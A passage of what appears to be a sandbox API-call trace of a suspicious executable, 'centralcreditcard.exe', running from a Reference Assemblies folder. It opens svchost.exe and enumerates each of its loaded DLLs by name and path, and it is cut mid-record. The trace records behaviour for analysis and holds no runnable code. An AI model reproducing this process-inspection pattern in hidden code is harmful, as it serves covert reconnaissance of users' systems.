CoTaskMemFree (pv=0xd94a00) [0076.259] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.259] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x340000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Reference Assemblies\\centralcreditcard.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\centralcreditcard.exe")) returned 0x41 [0076.260] CoTaskMemFree (pv=0xd94a00) [0076.260] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24a6ae0, cb=0x18 | out: lpmodinfo=0x24a6ae0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0076.260] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.260] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0076.261] CoTaskMemFree (pv=0xd94a00) [0076.261] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.261] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0076.261] CoTaskMemFree (pv=0xd94a00) [0076.261] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24a8ca0, cb=0x18 | out: lpmodinfo=0x24a8ca0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0076.261] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.261] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0076.262] CoTaskMemFree (pv=0xd94a00) [0076.262] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.262] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0076.262] CoTaskMemFree (pv=0xd94a00) [0076.262] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24aae60, cb=0x18 | out: lpmodinfo=0x24aae60*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0076.263] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0076.263] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0076.263] CoTaskMemFree (pv=0xd94a00) [0076.263] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0076.264] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x24ad030, cb=0x18 | out: lpmodinfo=0x24ad030*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0076.265] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0076.265] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0076.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3fc) returned 0x218 [0076.266] EnumProcessModules (in: hProcess=0x218, lphModule=0x24af750, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24af750, lpcbNeeded=0x23ee40) returned 1 [0076.269] GetModuleInformation (in: hProcess=0x218, hModule=0xff760000, lpmodinfo=0x24af9c0, cb=0x18 | out: lpmodinfo=0x24af9c0*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0076.270] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff760000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0076.270] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff760000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0076.270] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24b1bd0, cb=0x18 | out: lpmodinfo=0x24b1bd0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0076.271] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0076.271] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0076.271] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x24b3d90, cb=0x18 | out: lpmodinfo=0x24b3d90*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0076.272] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0076.272] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0076.273] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x24b5f60, cb=0x18 | out: lpmodinfo=0x24b5f60*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0076.273] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0076.274] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0076.274] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x24b8130, cb=0x18 | out: lpmodinfo=0x24b8130*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0076.275] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0076.275] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0076.276] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x24ba348, cb=0x18 | out: lpmodinfo=0x24ba348*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0076.276] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0076.277] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0076.278] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x24bc508, cb=0x18 | out: lpmodinfo=0x24bc508*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0076.278] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0076.279] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0076.280] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x24be6c8, cb=0x18 | out: lpmodinfo=0x24be6c8*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0076.280] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0076.281] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0076.282] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x24c0888, cb=0x18 | out: lpmodinfo=0x24c0888*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0076.282] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0076.283] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0076.284] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x24c2ae0, cb=0x18 | out: lpmodinfo=0x24c2ae0*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0076.285] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0076.286] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0076.287] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x24c4ca0, cb=0x18 | out: lpmodinfo=0x24c4ca0*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0076.308] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0076.309] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0076.310] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x24c6e50, cb=0x18 | out: lpmodinfo=0x24c6e50*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0076.311] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0076.312] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0076.313] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x24c9010, cb=0x18 | out: lpmodinfo=0x24c9010*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0076.314] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0076.315] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0076.316] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x24cb1d0, cb=0x18 | out: lpmodinfo=0x24cb1d0*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0076.317] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0076.318] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0076.319] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x24cd390, cb=0x18 | out: lpmodinfo=0x24cd390*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0076.320] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0076.321] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0076.323] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x24cf560, cb=0x18 | out: lpmodinfo=0x24cf560*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0076.325] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0076.326] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0076.327] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb2a0000, lpmodinfo=0x24d1730, cb=0x18 | out: lpmodinfo=0x24d1730*(lpBaseOfDll=0x7fefb2a0000, SizeOfImage=0x67000, EntryPoint=0x7fefb2b6060)) returned 1 [0076.328] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb2a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="es.dll") returned 0x6 [0076.330] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb2a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")) returned 0x1a [0076.331] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x24d39f8, cb=0x18 | out: lpmodinfo=0x24d39f8*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0076.332] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0076.334] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0076.335] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x24d5be0, cb=0x18 | out: lpmodinfo=0x24d5be0*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0076.336] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0076.338] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0076.339] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x24d7da0, cb=0x18 | out: lpmodinfo=0x24d7da0*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0076.341] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0076.342] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0076.343] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x24d9f60, cb=0x18 | out: lpmodinfo=0x24d9f60*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0076.345] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0076.346] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0076.348] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x24dc130, cb=0x18 | out: lpmodinfo=0x24dc130*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0076.350] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0076.351] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0076.353] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefad80000, lpmodinfo=0x24de2f0, cb=0x18 | out: lpmodinfo=0x24de2f0*(lpBaseOfDll=0x7fefad80000, SizeOfImage=0xa000, EntryPoint=0x7fefad847b8)) returned 1 [0076.355] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefad80000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="nsisvc.dll") returned 0xa [0076.356] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefad80000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll")) returned 0x1e [0076.358] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x24e04b0, cb=0x18 | out: lpmodinfo=0x24e04b0*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0076.360] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0076.361] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0076.363] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd680000, lpmodinfo=0x24e2660, cb=0x18 | out: lpmodinfo=0x24e2660*(lpBaseOfDll=0x7fefd680000, SizeOfImage=0x91000, EntryPoint=0x7fefd681440)) returned 1 [0076.365] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd680000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="SXS.DLL") returned 0x7 [0076.379] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd680000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SXS.DLL" (normalized: "c:\\windows\\system32\\sxs.dll")) returned 0x1b [0076.381] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef97b0000, lpmodinfo=0x24e4810, cb=0x18 | out: lpmodinfo=0x24e4810*(lpBaseOfDll=0x7fef97b0000, SizeOfImage=0x74000, EntryPoint=0x7fef97b66f0)) returned 1 [0076.383] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef97b0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="netprofm.dll") returned 0xc [0076.385] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef97b0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")) returned 0x20 [0076.387] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb3f0000, lpmodinfo=0x24e69e0, cb=0x18 | out: lpmodinfo=0x24e69e0*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0076.389] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="nlaapi.dll") returned 0xa [0076.391] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0076.393] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa1b0000, lpmodinfo=0x24e8ba0, cb=0x18 | out: lpmodinfo=0x24e8ba0*(lpBaseOfDll=0x7fefa1b0000, SizeOfImage=0x19000, EntryPoint=0x7fefa1b2b50)) returned 1 [0076.394] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa1b0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wdi.dll") returned 0x7 [0076.397] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa1b0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll")) returned 0x1b [0076.399] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa5d0000, lpmodinfo=0x24ead50, cb=0x18 | out: lpmodinfo=0x24ead50*(lpBaseOfDll=0x7fefa5d0000, SizeOfImage=0xc000, EntryPoint=0x7fefa5d602c)) returned 1 [0076.401] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa5d0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="npmproxy.dll") returned 0xc [0076.403] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa5d0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")) returned 0x20 [0076.405] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9420000, lpmodinfo=0x24ecf20, cb=0x18 | out: lpmodinfo=0x24ecf20*(lpBaseOfDll=0x7fef9420000, SizeOfImage=0xd8000, EntryPoint=0x7fef94aa7d0)) returned 1 [0076.407] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9420000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="perftrack.dll") returned 0xd [0076.409] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9420000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll")) returned 0x21 [0076.411] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef93a0000, lpmodinfo=0x24ef0f0, cb=0x18 | out: lpmodinfo=0x24ef0f0*(lpBaseOfDll=0x7fef93a0000, SizeOfImage=0x7c000, EntryPoint=0x7fef93a11d4)) returned 1 [0076.413] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef93a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wer.dll") returned 0x7 [0076.415] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef93a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")) returned 0x1b [0076.418] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbca0000, lpmodinfo=0x24f12a0, cb=0x18 | out: lpmodinfo=0x24f12a0*(lpBaseOfDll=0x7fefbca0000, SizeOfImage=0x18000, EntryPoint=0x7fefbca1130)) returned 1 [0076.420] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbca0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0076.422] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbca0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")) returned 0x1e [0076.424] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x24f3460, cb=0x18 | out: lpmodinfo=0x24f3460*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0076.426] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="Secur32.dll") returned 0xb [0076.428] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0076.431] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x24f5838, cb=0x18 | out: lpmodinfo=0x24f5838*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0076.433] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0076.435] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0076.438] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa0d0000, lpmodinfo=0x24f79f8, cb=0x18 | out: lpmodinfo=0x24f79f8*(lpBaseOfDll=0x7fefa0d0000, SizeOfImage=0x12000, EntryPoint=0x7fefa0d1050)) returned 1 [0076.440] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa0d0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="AEPIC.dll") returned 0x9 [0076.443] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa0d0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\AEPIC.dll" (normalized: "c:\\windows\\system32\\aepic.dll")) returned 0x1d [0076.446] GetModuleInformation (in: hProcess=0x218, hModule=0x73ff0000, lpmodinfo=0x24f9bd0, cb=0x18 | out: lpmodinfo=0x24f9bd0*(lpBaseOfDll=0x73ff0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0076.448] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x73ff0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="sfc.dll") returned 0x7 [0076.451] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x73ff0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll")) returned 0x1b [0076.453] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa0c0000, lpmodinfo=0x24fbd80, cb=0x18 | out: lpmodinfo=0x24fbd80*(lpBaseOfDll=0x7fefa0c0000, SizeOfImage=0x10000, EntryPoint=0x7fefa0c1010)) returned 1 [0076.456] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa0c0000, lpBaseName=0xd94a00, nSize=0x800 | out: 